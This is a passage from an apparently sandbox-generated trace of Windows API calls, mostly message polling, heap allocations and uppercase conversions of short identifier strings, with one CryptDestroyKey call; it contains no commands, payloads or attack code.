lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0248.137] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0248.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0248.137] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0248.137] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0248.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.137] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0248.137] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.137] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0248.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0248.137] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0248.137] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.138] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0248.138] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.138] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.138] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0248.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0248.138] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.139] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0248.139] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.139] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0248.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0248.139] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.139] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0248.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.140] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.140] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.140] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0248.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.141] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0248.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0248.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0248.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0248.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.141] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0248.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0248.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0248.142] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0248.142] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0248.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0248.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0248.142] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0248.142] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.142] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0248.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0248.142] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.142] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0248.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0248.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.143] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.143] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0248.143] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0248.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0248.144] CryptDestroyKey (hKey=0xaa5660) returned 1 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0248.144] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0248.144] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0248.144] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0248.144] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0248.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0248.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0248.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.145] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0248.145] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.145] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0248.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0248.145] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0248.145] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0248.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0248.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0248.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0248.145] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0248.145] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0248.145] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0248.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0248.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0248.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0248.146] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0248.146] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0248.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0248.147] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.147] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0248.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0248.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0248.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0248.148] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.148] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0248.148] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0248.148] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.148] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.148] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0248.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.149] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0248.149] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0248.149] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0248.149] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0248.150] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0248.150] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.150] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0248.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0248.150] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0248.150] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0248.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.150] 